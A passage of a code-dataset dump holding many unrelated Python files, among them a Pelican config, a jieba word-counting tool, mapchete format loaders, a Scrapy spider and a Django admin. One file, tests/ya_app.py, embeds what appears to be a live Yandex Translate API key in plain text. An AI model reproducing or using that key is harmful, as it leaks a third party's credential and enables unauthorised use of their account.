\"\"\"\n Gets the path to the proper schema file for the given urn.\n\n Parameters\n ----------\n the_urn : str\n\n Returns\n -------\n str\n \"\"\"\n\n result = get_urn_details(the_urn)\n return result.get('schema', None)\n\n\ndef get_versions() -> List[str]:\n \"\"\"\n Gets a list of recognized CPHD urns.\n\n Returns\n -------\n List[str]\n \"\"\"\n\n return list(sorted(urn_mapping.keys(), key=lambda x: urn_mapping[x]['tuple']))\n","sub_path":"sarpy/io/phase_history/cphd_schema/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"256397782","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nimport os.path\n\nAUTHOR = 'tvd'\nSITENAME = 'tvd.dev'\nSITEURL = ''\n\nPATH = 'content'\n\nTIMEZONE = 'US/Pacific'\n\nDEFAULT_LANG = 'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\nSOCIAL = (\n ('GitHub', 'https://github.com/thomasvandoren'),\n ('LinkedIn', 'https://www.linkedin.com/in/thomasvandoren'),\n ('Twitter', 'https://twitter.com/tvd0x2a'),\n)\n\nSTATIC_PATHS = [\n 'images',\n 'presentations',\n]\n\nDEFAULT_PAGINATION = 10\n\nTHEME = 'pelican-themes/tuxlite_tbs'\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"282965823","text":"import requests\nimport os\n\n\n# функция перевода текста\ndef translate_it(text):\n URL = 'https://translate.yandex.net/api/v1.5/tr.json/translate'\n API = 'trnsl.1.1.20200414T142315Z.82f7f234a435ac4f.5c0f9da21d5fd976283bc1c8447d85d38d7c6109'\n \n params = {\n 'key': API,\n 'text': text,\n 'lang': 'en-ru',\n }\n\n response = requests.get(URL, params=params)\n text = response.json()\n \n return text\n\n\nif __name__ == '__main__':\n print(translate_it('good'))","sub_path":"tests/ya_app.py","file_name":"ya_app.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"508358029","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\n\n\n# In[2]:\n\n\ndf1 = pd.DataFrame([[\"James\",\"Robert\"],[\"James\",\"Robert\"],[\"James\",\"Andrew\"],[\"Robert\",\"James\"],[\"0101\",\"2020\"],[\"2020\",\"0101\"]],\n columns=[\"ColA\",\"ColB\"])\ndf1\n\n\n# In[3]:\n\n\ndf2 = df1.drop_duplicates()\ndf2\n\n\n# In[4]:\n\n\ndf2['ColC'] = df2.apply(lambda x: x['ColA'] + '_' + x['ColB'] if x['ColA'] >= x['ColB'] else x['ColB'] + '_' + x['ColA'], axis=1)\ndf2\n\n\n# In[5]:\n\n\ndf2.drop_duplicates(subset=[\"ColC\"])\n\n","sub_path":"Python/Elements/Pandas/pandas_undirected_edge_list.py","file_name":"pandas_undirected_edge_list.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"449276693","text":"import urllib.request\r\n\r\ndef load_data():\r\n url = \"http://www.baidu.com/\"\r\n #get的请求\r\n #http请求\r\n #response:http相应的对象\r\n response = urllib.request.urlopen(url)\r\n print(response)\r\n #读取内容 bytes类型\r\n data = response.read()\r\n print(data)\r\n #将文件获取的内容转换成字符串\r\n str_data = data.decode(\"utf-8\")\r\n print(str_data)\r\n #将数据写入文件\r\n with open(\"baidu.html\",\"w\",encoding=\"utf-8\")as f:\r\n f.write(data)\r\n #将字符串类型转换成bytes\r\n str_name = \"baidu\"\r\n bytes_name =str_name.encode(\"utf-8\")\r\n print(bytes_name)\r\n\r\n #python爬取的类型:str bytes\r\n #如果爬取回来的是bytes类型:但是你写入的时候需要字符串 decode(\"utf-8\")\r\n #如果爬取过来的是str类型:但你要写入的是bytes类型 encode(\"\"utf-8\")\r\nload_data()\r\n\r\n","sub_path":"爬虫教程/urllib/爬虫第一节/01-url_opne_code.py","file_name":"01-url_opne_code.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"598603132","text":"from datetime import datetime\nfrom sqlalchemy import or_, and_, desc\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom app import db\nfrom app.models.exceptions import ServiceError\nfrom app.models.performance_phrases import PerformancePhrase\nfrom app.models.employee_to_review import EmployeeToReview\nfrom app.models.users import User\n\n\ndef find_all() -> [PerformancePhrase]:\n return PerformancePhrase.query.all()\n\n\ndef find_filtered(current_performance_phrase: User, queryParams) -> []:\n query_filter = queryParams.get('filter', {})\n limit = int(queryParams.get('pageSize', 10))\n offset = queryParams.get('pageNumber', 0) * limit\n search_text = query_filter.get('searchText', '')\n reviewed_by = query_filter.get('reviewedBy', None)\n reviewed = query_filter.get('reviewed', None)\n if reviewed is not None and reviewed_by is not None:\n q1 = EmployeeToReview.query.filter(\n and_(EmployeeToReview.reviewed_by == reviewed_by,\n EmployeeToReview.reviewed == reviewed,\n )).all()\n not_in = []\n for p in q1:\n not_in.append(p.performance_phrase_id)\n\n q = PerformancePhrase.query.filter(PerformancePhrase.id.notin_(not_in))\n return q.offset(offset).limit(limit).all(), q.count()\n else:\n q = PerformancePhrase.query\n return q.offset(offset).limit(limit).all(), q.count()\n\n\ndef find_one(performance_phrase_id: int) -> PerformancePhrase:\n if performance_phrase_id is None:\n raise ServiceError\n return PerformancePhrase.query.filter_by(id=performance_phrase_id).first()\n\n\ndef save(performance_phrase_id: int, data: {}) -> PerformancePhrase:\n try:\n if performance_phrase_id is None:\n performance_phrase = PerformancePhrase.from_args(\n data.get('name') if data.get('name') is not '' else None,\n data.get('tag') if data.get('tag') is not '' else None,\n datetime.utcnow(),\n datetime.utcnow()\n )\n db.session.add(performance_phrase)\n else:\n performance_phrase = find_one(performance_phrase_id)\n performance_phrase.name = data.get('name')\n performance_phrase.tag = data.get('tag')\n performance_phrase.updated_at = datetime.now()\n db.session.commit()\n\n return performance_phrase\n except SQLAlchemyError as e:\n code, msg = e.orig.args\n raise ServiceError\n\n\ndef delete(performance_phrase_id: int) -> bool:\n if performance_phrase_id is None:\n raise ServiceError\n try:\n performance_phrase = find_one(performance_phrase_id)\n db.session.delete(performance_phrase)\n db.session.commit()\n return True\n except SQLAlchemyError:\n raise ServiceError\n\n","sub_path":"app/services/performance_phrase_service.py","file_name":"performance_phrase_service.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"534349508","text":"# -*- coding=utf-8 -*-\n''' \n 6/6更新:\n 测试了一下速度, 大概花费70s / 万条\n 1.增加了输出目录的选项\n python (--dic dictname) + 其他参数 + filename(dirname)outputname position \n 2.支持正则表达式数词, 词典里的每一个词都会被转为正则表达式 (?<=\\s)词(?=\\s), 词典里带有标点符号的词是统计不��的, \n 因为分词结果中的标点符号是单独空格隔开的.\n 3.会生成一个像这样的allinfo.txt\n 词典名:xxxx.dict\n 文件名, 词典总词频, 文本总词频, 记录数\n 2013广元.csv, 10000, 10000,200\n 2013广州.csv, 40000, 100000,3000\n 4.命名会有词典名作为前缀\n \n 5/26更新:\n 修复了--pa可能会出现的bug\n\n 5/24更新:\n 1.优化了数词功能.\n 2.增加了--pt选项, 加了--pt后, 会输出每处理1W条所花费的时间.\n 3.增加了--ocoding选项, --ocoding utf-8 表示所有的输出文件的保存方式为utf8(默认为utf-8)\n \n 注意: 要注意输入文件与输出文件的编码关系, 比如输入文件用的是GB18030编码, 输出用GB2312就会出错, 因为GB2312相当于GB18030的\n 子集, 有些GB18030在读入的时候可以解码的字符, 用GB2312编码输出就会出错.\n \n 5/22日更新:\n 重新解决了转义符的问题\n------------------------------------------------------ \n 功能:\n 分词: 有无词典分词\n 统计: 不统计, 统计全部, 按词典统计\n------------------------------------------------------\n 使用:\n python (--dic dictname) + 其他参数 + filename(dirname)outputname position \n \n position: 需要分词的列\n \n 其他参数:\n --dic: 后面需要跟着字典的名字\n --pa: 分词+统计全部的词的词频\n --pd: 分词+只统计词典中的词的词频\n --icoding: 后面跟着输入文件的编码 比如--icoding 'utf-8' \n --title: 如果源文件有title,需要加入此项,否则默认源文件没有title\n --ocoding: 输出文件的编码\n\n -a: 只统计,统计全部词的词频\n -d: 只统计,统计词典中的词频\n -p: 只分词,不统计\n -g: 是否产生一个全局的词频\n \n 注意: 参数前面有的是两横, 有的是一横\n------------------------------------------------------\n'''\n\n\nimport jieba\nimport jieba.analyse\nimport re\nimport io\nimport os\nimport time\nimport pickle\nimport copy\nimport getopt\nimport sys\nimport pandas\n\ndef getkey(x):\n return x[1]\n\n\ndef read_topic(dirname):\n print('开始读入主题词典')\n start = time.time()\n word_topic = {}\n for root,dir,files in os.walk(dirname):\n for name in files:\n level1 = re.split('/', root)[1]\n level2 = re.split('\\.', name)[0]\n with open(root + '/' + name, encoding='utf-8') as fr:\n for item in fr:\n word_topic[item.strip()] = [level1, level2]\n print('读入主题词典结束')\n print('耗时{}s'.format(round(time.time()-start, 2)))\n return word_topic\n\n\ndef pure_part(filename, position):\n\n chunk_size = 10000\n name = re.split('/', filename)[-1]\n fwname = outputname + '/p_res/{}_part_'.format(re.split('\\.', dicname)[0]) + name\n\n if not os.path.isdir(outputname + '/p_res'):\n os.mkdir(outputname + '/p_res')\n\n print(name + \" 开始分词.\")\n count_ = 0\n if os.path.isfile(fwname):\n print(fwname, \" 分词结果已经存在, 跳过分词\")\n return\n try:\n with io.open(fwname, 'w', encoding=ocoding) as fw:\n fr = pandas.read_csv(filename, encoding=infilecoding, iterator=True, error_bad_lines=False,\n warn_bad_lines=True, header=None if not title else 0, dtype=str)\n first = True\n start = time.time()\n while True:\n name_pattern = re.compile(r'@.*?\\s|@.*?:|@.*?$|/|\\s|\\\\')\n chunk = fr.get_chunk(chunk_size)\n content_name = chunk.columns[position]\n newcol = '微博类型'\n\n chunk.insert(len(chunk.columns), newcol, None)\n\n for index, row in chunk.iterrows():\n count_ += 1\n content = row[content_name]\n if pandas.isnull(content):\n chunk.ix[index, content_name] = u''\n chunk.ix[index, newcol] = 0 # 原本为空\n elif not content.count(u'转发微博'):\n content = name_pattern.sub('', content)\n words = jieba.lcut(content)\n jres = ' '.join(words)\n if jres.strip() == \"\":\n chunk.ix[index, newcol] = 2 # 去掉网名后为空\n else:\n chunk.ix[index, newcol] = 3 # 正常微博\n chunk.ix[index, content_name] = ' '.join(words).strip('\"')\n else:\n chunk.ix[index, content_name] = u''\n chunk.ix[index, newcol] = 1 # 仅仅含有'转发微博'\n chunk.to_csv(fw, encoding=ocoding, index=False, header=first and title, quoting=1)\n if first:\n first = False\n if pt:\n print('当前分词{}条,耗时{}s'.format(count_, round(time.time()-start, 2)))\n except StopIteration:\n print(name + \" 分词结束.\")\n\n\ndef pure_count(dic, filename, position):\n name = re.split('/', filename)[-1]\n\n chunk_size = 10000\n global g\n if g:\n global allsave\n\n if not os.path.isdir(outputname + \"/count_res\"):\n os.mkdir(outputname + \"/count_res\")\n\n save = {}\n\n wordnum_indic = 0\n textnum = 0\n wordnum = 0\n\n with io.open(outputname + '/count_res/{}_count_'.format(re.split('\\.', dicname)[0]) + name, 'w', encoding=ocoding) as fw:\n fr = pandas.read_csv(filename, encoding=infilecoding, iterator=True, error_bad_lines=False,\n warn_bad_lines=True, header=None if not title else 0, dtype=str)\n fw.write(u'word,count\\n')\n try:\n if dic != {}:\n save = copy.deepcopy(dic)\n start = time.time()\n while True:\n chunk = fr.get_chunk(chunk_size)\n content_name = chunk.columns[position]\n chunk_str = \" \"\n\n for index, row in chunk.iterrows():\n textnum += 1\n content = row[content_name]\n\n if not pandas.isnull(content) and dic != {} and (d or pd):\n chunk_str += \" \" + content.strip('\"')\n\n if not pandas.isnull(content):\n words = re.split(' ', content)\n wordnum += len(words)\n else:\n words = []\n\n if dic == {}:\n for word in words:\n if word not in save:\n save[word] = 1\n else:\n save[word] += 1\n if g:\n if word not in allsave:\n allsave[word] = 1\n else:\n allsave[word] += 1\n # print('结束一行', time.time()-start)\n if pt:\n print('当前数词{}条, 耗时{}s'.format(textnum, round(time.time()-start, 2)))\n\n chunk_str += \" \"\n if dic != {} and (d or pd):\n for word in word_regx:\n regex = word_regx[word]\n temp_num = len(regex.findall(chunk_str))\n if word in save:\n save[word] += temp_num\n wordnum_indic += temp_num\n if g:\n if word in allsave:\n allsave[word] += temp_num\n\n except StopIteration:\n print(name + ' 数词结束.')\n\n res = []\n for key in save:\n res.append([key, save[key]])\n res.sort(key=getkey, reverse=True)\n for item in res:\n fw.write(item[0] + ',' + str(item[1]) + '\\n')\n return \"{},{},{},{}\\n\".format(name, wordnum_indic, wordnum, textnum)\n\n\ndef part_count(filename, position, dic):\n\n name = re.split('/', filename)[-1]\n fwname = outputname + '/p_res/{}_part_'.format(re.split('\\.', dicname)[0]) + name\n chunk_size = 20000\n wordnum_indic = 0\n textnum = 0\n wordnum = 0\n\n global g\n if g:\n global allsave\n save = {}\n\n if not os.path.isdir(outputname + \"/p_res\"):\n os.mkdir(outputname + \"/p_res\")\n if not os.path.isdir(outputname + \"/count_res\"):\n os.mkdir(outputname + \"/count_res\")\n\n print(name + \" 分词+数词开始.\")\n if os.path.isfile(fwname):\n print(fwname, \"分词已经存在, 仅仅数词\")\n # 存在就只数词\n pure_count(dic, fwname, position)\n\n else:\n try:\n if dic != {}:\n save = copy.deepcopy(dic)\n\n with io.open(fwname, 'w', encoding=ocoding) as fw:\n fr = pandas.read_csv(filename, encoding=infilecoding, iterator=True, error_bad_lines=False,\n warn_bad_lines=True, header=None if not title else 0, dtype=str)\n first = True\n start = time.time()\n while True:\n name_pattern = re.compile(r'@.*?\\s|@.*?:|@.*?$|/|\\s|\\\\')\n chunk = fr.get_chunk(chunk_size)\n content_name = chunk.columns[position]\n newcol = '微博类型'\n chunk.insert(len(chunk.columns), newcol, None)\n chunk_str = \" \"\n for index, row in chunk.iterrows():\n words = []\n textnum += 1\n content = row[content_name]\n if pandas.isnull(content):\n chunk.ix[index, content_name] = u''\n chunk.ix[index, newcol] = 0 # 原本为空\n elif not content.count(u'转发微博'):\n content = name_pattern.sub('', content)\n words = jieba.lcut(content)\n jres = ' '.join(words).strip('\"')\n if jres.strip() == \"\":\n chunk.ix[index, newcol] = 2 # 去掉网名后为空\n else:\n chunk_str += \" \" + jres\n wordnum += len(words)\n chunk.ix[index, newcol] = 3 # 正常微博\n chunk.ix[index, content_name] = jres\n else:\n chunk.ix[index, content_name] = u''\n chunk.ix[index, newcol] = 1 # 仅仅含有'转发微博'\n\n if dic == {}:\n for word in words:\n if word not in save:\n save[word] = 1\n else:\n save[word] += 1\n if g:\n if word not in allsave:\n allsave[word] = 1\n else:\n allsave[word] += 1\n\n chunk.to_csv(fw, encoding=ocoding, index=False, header=first and title, quoting=1)\n\n chunk_str += \" \"\n if dic != {} and (d or pd):\n for word in word_regx:\n regex = word_regx[word]\n temp_num = len(regex.findall(chunk_str))\n if word in save:\n save[word] += temp_num\n wordnum_indic += temp_num\n if g:\n if word in allsave:\n allsave[word] += temp_num\n if pt:\n print('当前数词+分词{}条, 耗时{}s'.format(textnum, round(time.time() - start, 2)))\n\n if first:\n first = False\n\n except StopIteration:\n print(name + \"分词+数词结束\")\n\n with io.open(outputname + '/count_res/{}_count_part_'.format(re.split('\\.', dicname)[0]) + name, 'w', encoding=ocoding) as fw:\n fw.write(u'word,count\\n')\n res = []\n for key in save:\n res.append([key, save[key]])\n res.sort(key=getkey, reverse=True)\n for item in res:\n fw.write(item[0] + ',' + str(item[1]) + '\\n')\n\n return \"{},{},{},{}\\n\".format(name, wordnum_indic, wordnum, textnum)\n\nif __name__ == '__main__':\n all_start = time.time()\n\n options, args = getopt.getopt(sys.argv[1:], \"gapd\", [\"dic=\", \"pa\", \"pd\", \"icoding=\", 'title', 'pt', 'ocoding='])\n\n position = -1\n filename = \"\"\n dicname = \"\"\n dic = {}\n allsave = {}\n all_info = []\n g = False\n a = False\n d = False\n p = False\n pa = False\n pd = False\n title = False\n pt = False\n\n\n\n dictcoding = 'utf-8'\n infilecoding = 'utf-8'\n ocoding = 'utf-8'\n\n filename = args[0]\n outputname = args[1]\n position = int(args[2])\n word_regx = {}\n\n\n for o, a_ in options:\n if o == '--dic':\n dicname = a_\n print(\"载入字典\", dicname)\n if o == '-g':\n g = True\n print(\"会产生全局词频\")\n\n if o == '-a':\n a = True\n print('仅统计, 统计全部词频')\n\n # 只统计词典中的词的词频\n if o == '-d':\n d = True\n print('仅统计, 统计词典中的词频')\n\n # 只分词,不统计\n if o == '-p':\n p = True\n print('只分词, 不统计')\n\n # 分词+统计全部词的词频\n if o == '--pa':\n pa = True\n print('分词 + 统计全部词的词频')\n\n # 分词+统计词典词频\n if o == '--pd':\n pd = True\n print('分词 + 统计词典中的词频')\n\n if o == '--icoding':\n infilecoding = a_\n\n if o == '--title':\n title = True\n\n if o == '--pt':\n pt = True\n\n if o == '--ocoding':\n ocoding = a_\n\n if (d or pd) and dicname == \"\":\n print(\"请输入一个词典, 否则将不会有词典被使用\")\n\n\n print('读入文件编码为{}'.format(infilecoding))\n print('输出文件的编码为{}'.format(ocoding))\n\n # 载入词典\n if dicname != \"\":\n if p or pd:\n jieba.load_userdict(dicname)\n with io.open(dicname, 'r', encoding='utf-8') as fr:\n for line in fr:\n line = line.strip('\\n')\n dic[line] = 0\n word_regx[line.strip()] = re.compile('(?<=\\s){}(?=\\s)'.format(line))\n if g:\n allsave = copy.deepcopy(dic)\n else:\n print(\"未载入词典\")\n\n\n if os.path.isdir(filename):\n for root, dir, file in os.walk(filename):\n for name in file:\n filedir = root + '/' + name\n filestart = time.time()\n # 只统计, 不分词\n if a or d:\n all_info.append(pure_count(dic, filedir, position))\n # 只分词,不统计\n if p:\n pure_part(filedir, position)\n # 分词+统计\n if pd or pa:\n all_info.append(part_count(filedir, position, dic))\n fileend = time.time()\n print('{} 耗时 {}s'.format(filedir, fileend - filestart))\n\n if g:\n with io.open(outputname + '/count_res/{}_ALL_Frequency.txt'.format(dicname), 'w', encoding=ocoding) as fw:\n fw.write(u'word,count\\n')\n res = []\n for key in allsave:\n res.append([key, allsave[key]])\n res.sort(key=getkey, reverse=True)\n for item in res:\n fw.write(item[0] + ',' + str(item[1]) + '\\n')\n else:\n filestart = time.time()\n if a or d:\n all_info.append(pure_count(dic, filename, position))\n # 只分词,不统计\n if p:\n pure_part(filename, position)\n # 分词+统计\n if pd or pa:\n all_info.append(part_count(filename, position, dic))\n fileend = time.time()\n print('{} 耗时 {}s'.format(filename, round(fileend - filestart, 2)))\n\n with open(outputname + '/all_info.txt', 'w', encoding=ocoding) as fw:\n fw.write('词典:{}\\n'.format(dicname))\n fw.write('文件名,词典总词频,文本总词频,文本记录数\\n')\n fw.writelines(all_info)\n\n allend = time.time()\n\n print('总耗时: {}s'.format(round(allend-all_start, 2)))","sub_path":"count_all_0605_re.py","file_name":"count_all_0605_re.py","file_ext":"py","file_size_in_byte":17528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"407573914","text":"import re\npi = open('pi_million_digits.txt', 'r')\n\ndata = pi.read()\nlists = str(data).split('.')\n\n#removing all the white spaces using regex in python\ndigits = re.sub(r\"\\s+\", \"\", lists[1])\n\n\ntotal = 0\n\nfor digit in digits:\n total += int(digit)\n\n\n\nprint(\"Sum of all the digits after decimal in Pi: \",total)\n\n","sub_path":"assignment/fileAndException_handling/sumOfPi.py","file_name":"sumOfPi.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"107264920","text":"\"\"\"\nFunctions handling output formats.\n\nThis module deserves a cleaner rewrite some day.\n\"\"\"\n\nimport logging\nimport os\nimport pkg_resources\nimport warnings\n\nfrom mapchete import errors\n\n\nlogger = logging.getLogger(__name__)\n_DRIVERS_ENTRY_POINT = \"mapchete.formats.drivers\"\n_FILE_EXT_TO_DRIVER = {}\n\n\ndef _file_ext_to_driver():\n global _FILE_EXT_TO_DRIVER\n if _FILE_EXT_TO_DRIVER:\n return _FILE_EXT_TO_DRIVER\n else:\n _FILE_EXT_TO_DRIVER = {}\n for v in pkg_resources.iter_entry_points(_DRIVERS_ENTRY_POINT):\n _driver = v.load()\n if not hasattr(_driver, \"METADATA\"):\n warnings.warn(\n \"driver %s cannot be loaded, METADATA is missing\" % (\n str(v).split(\" \")[-1]\n )\n )\n continue\n else:\n metadata = v.load().METADATA\n try:\n driver_name = metadata[\"driver_name\"]\n for ext in metadata[\"file_extensions\"]:\n if ext in _FILE_EXT_TO_DRIVER:\n _FILE_EXT_TO_DRIVER[ext].append(driver_name)\n else:\n _FILE_EXT_TO_DRIVER[ext] = [driver_name]\n except Exception:\n pass\n if not _FILE_EXT_TO_DRIVER:\n raise errors.MapcheteDriverError(\"no drivers could be found\")\n return _FILE_EXT_TO_DRIVER\n\n\ndef available_output_formats():\n \"\"\"\n Return all available output formats.\n\n Returns\n -------\n formats : list\n all available output formats\n \"\"\"\n output_formats = []\n for v in pkg_resources.iter_entry_points(_DRIVERS_ENTRY_POINT):\n driver_ = v.load()\n if hasattr(driver_, \"METADATA\") and (\n driver_.METADATA[\"mode\"] in [\"w\", \"rw\"]\n ):\n output_formats.append(driver_.METADATA[\"driver_name\"])\n return output_formats\n\n\ndef available_input_formats():\n \"\"\"\n Return all available input formats.\n\n Returns\n -------\n formats : list\n all available input formats\n \"\"\"\n input_formats = []\n for v in pkg_resources.iter_entry_points(_DRIVERS_ENTRY_POINT):\n driver_ = v.load()\n if hasattr(driver_, \"METADATA\") and (driver_.METADATA[\"mode\"] in [\"r\", \"rw\"]):\n input_formats.append(driver_.METADATA[\"driver_name\"])\n return input_formats\n\n\ndef load_output_writer(output_params, readonly=False):\n \"\"\"\n Return output class of driver.\n\n Returns\n -------\n output : ``OutputData``\n output writer object\n \"\"\"\n if not isinstance(output_params, dict):\n raise TypeError(\"output_params must be a dictionary\")\n driver_name = output_params[\"format\"]\n for v in pkg_resources.iter_entry_points(_DRIVERS_ENTRY_POINT):\n _driver = v.load()\n if all(\n [hasattr(_driver, attr) for attr in [\"OutputData\", \"METADATA\"]]\n ) and (\n _driver.METADATA[\"driver_name\"] == driver_name\n ):\n return _driver.OutputData(output_params, readonly=readonly)\n raise errors.MapcheteDriverError(\n \"no loader for driver '%s' could be found.\" % driver_name\n )\n\n\ndef load_input_reader(input_params, readonly=False):\n \"\"\"\n Return input class of driver.\n\n Returns\n -------\n input_params : ``InputData``\n input parameters\n \"\"\"\n logger.debug(\"find input reader with params %s\", input_params)\n if not isinstance(input_params, dict):\n raise TypeError(\"input_params must be a dictionary\")\n if \"abstract\" in input_params:\n driver_name = input_params[\"abstract\"][\"format\"]\n elif \"path\" in input_params:\n if os.path.splitext(input_params[\"path\"])[1]:\n input_file = input_params[\"path\"]\n driver_name = driver_from_file(input_file)\n else:\n logger.debug(\"%s is a directory\", input_params[\"path\"])\n driver_name = \"TileDirectory\"\n else:\n raise errors.MapcheteDriverError(\"invalid input parameters %s\" % input_params)\n for v in pkg_resources.iter_entry_points(_DRIVERS_ENTRY_POINT):\n driver_ = v.load()\n if hasattr(driver_, \"METADATA\") and (\n driver_.METADATA[\"driver_name\"] == driver_name\n ):\n return v.load().InputData(input_params, readonly=readonly)\n raise errors.MapcheteDriverError(\n \"no loader for driver '%s' could be found.\" % driver_name)\n\n\ndef driver_from_file(input_file):\n \"\"\"\n Guess driver from file extension.\n\n Returns\n -------\n driver : string\n driver name\n \"\"\"\n file_ext = os.path.splitext(input_file)[1].split(\".\")[1]\n if file_ext not in _file_ext_to_driver():\n raise errors.MapcheteDriverError(\n \"no driver could be found for file extension %s\" % file_ext\n )\n driver = _file_ext_to_driver()[file_ext]\n if len(driver) > 1:\n warnings.warn(\n \"more than one driver for file found, taking %s\" % driver[0]\n )\n return driver[0]\n","sub_path":"mapchete/formats/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"13917892","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\nfrom locations.items import GeojsonPointItem\n\n\nclass LjsilversSpider(scrapy.Spider):\n name = \"ljsilvers\"\n item_attributes = {\"brand\": \"Long John Silver's\", \"brand_wikidata\": \"Q1535221\"}\n allowed_domains = [\"ljsilvers.com\"]\n start_urls = (\n \"https://viewer.blipstar.com/searchdbnew?uid=2483677&lat=45&lng=-103&value=10000\",\n )\n\n def parse(self, response):\n for row in response.json():\n if row.keys() == {\"fulltotal\", \"total\", \"units\"}:\n continue\n addr = scrapy.Selector(text=row[\"a\"])\n properties = {\n \"name\": row[\"n\"],\n \"ref\": row[\"bpid\"],\n \"lat\": row[\"lat\"],\n \"lon\": row[\"lng\"],\n \"addr_full\": addr.xpath(\"//p/text()\").extract_first(),\n \"city\": addr.css(\".storecity ::text\").extract_first(),\n \"state\": addr.css(\".storestate ::text\").extract_first(),\n \"postcode\": addr.css(\".storepostalcode ::text\").extract_first(),\n \"country\": row[\"c\"],\n \"phone\": row.get(\"p\"),\n }\n yield GeojsonPointItem(**properties)\n","sub_path":"locations/spiders/ljsilvers.py","file_name":"ljsilvers.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"368194736","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\nGiven a string that consists of only uppercase English letters, you can replace any letter in the string with another letter at most k times. Find the length of a longest substring containing all repeating letters you can get after performing the above operations.\n\nNote:\nBoth the string's length and k will not exceed 104.\n\nExample 1:\n\nInput:\ns = \"ABAB\", k = 2\n\nOutput:\n4\n\nExplanation:\nReplace the two 'A's with two 'B's or vice versa.\nExample 2:\n\nInput:\ns = \"AABABBA\", k = 1\n\nOutput:\n4\n\nExplanation:\nReplace the one 'A' in the middle with 'B' and form \"AABBBBA\".\nThe substring \"BBBB\" has the longest repeating letters, which is 4.\n\"\"\"\n\nclass Solution(object):\n def characterReplacement(self, s, k):\n \"\"\"\n :type s: str\n :type k: int\n :rtype: int\n \"\"\"\n if not s:\n return 0\n counts = collections.Counter()\n start = 0\n for end in xrange(len(s)):\n counts[s[end]] += 1\n if end - start + 1 - counts.most_common(1)[0][1] > k:\n counts[s[start]] -= 1\n start += 1\n return end - start + 1\n","sub_path":"Python/424-LongestRepeatingCharacterReplacement/characterReplacement.py","file_name":"characterReplacement.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"590301032","text":"import cPickle\r\n\r\ndef unpickle(file):\r\n \"\"\"Loads and returns a pickled data structure in the given `file` name\r\n Example usage:\r\n data = unpickle('output/U_20_std')\r\n \"\"\"\r\n fo = open(file, 'rb')\r\n data = cPickle.load(fo)\r\n fo.close()\r\n return data\r\n\r\ndef pickle(data, file):\r\n \"\"\"Dumps data to a file\r\n Example usage:\r\n pickle(U, 'output/U_20_std')\r\n \"\"\"\r\n fo = open(file,'wb')\r\n cPickle.dump(data,fo)\r\n fo.close()","sub_path":"final_project_code_mac/SrcTeam/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"552586963","text":"import pygame\nimport sys\npygame.init()\n\nclass Tower(pygame.sprite.Sprite):\n\n def __init__(self, x, y):\n\n super().__init__()\n self.image = pygame.image.load('resources/tower.png')\n self.rect = pygame.Rect(x, y, 50, 100)\n","sub_path":"tower.py","file_name":"tower.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"82048081","text":"from django.contrib import admin\nfrom Evaluation.models import *\n\nclass EvaluationAdmin(admin.ModelAdmin):\n fieldsets = [\n (\n None, {\n 'fields': [\n 'submission',\n 'tutor',\n 'creation_date',\n 'evaluation_text',\n 'evaluation_points',\n 'submission_time',\n 'lock_time',\n ]\n }\n ),\n ]\n list_display = ('id', 'get_submission_author', 'get_submission', 'get_tutor', 'creation_date', 'evaluation_text', 'evaluation_points', 'submission_time', 'lock_time', )\n readonly_fields = (\"creation_date\",)\n\n def get_submission(self, evaluation):\n url = '{}'\n elaboration_id = evaluation.submission.id\n return url.format(elaboration_id, elaboration_id)\n get_submission.short_description = 'Submission'\n get_submission.allow_tags = True\n\n def get_submission_author(self, evaluation):\n url = '{}'\n user_id = evaluation.submission.user.id\n matriculation_number = evaluation.submission.user.matriculation_number\n return url.format(user_id, matriculation_number)\n get_submission_author.short_description = 'Submission author'\n get_submission_author.allow_tags = True\n\n def get_tutor(self, evaluation):\n url = '{}'\n user_id = evaluation.tutor.id\n nickname = evaluation.tutor.nickname\n return url.format(user_id, nickname)\n get_tutor.short_description = 'Tutor'\n get_tutor.allow_tags = True\n\n search_fields = ['tutor__nickname']\n\nadmin.site.register(Evaluation, EvaluationAdmin)","sub_path":"Evaluation/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 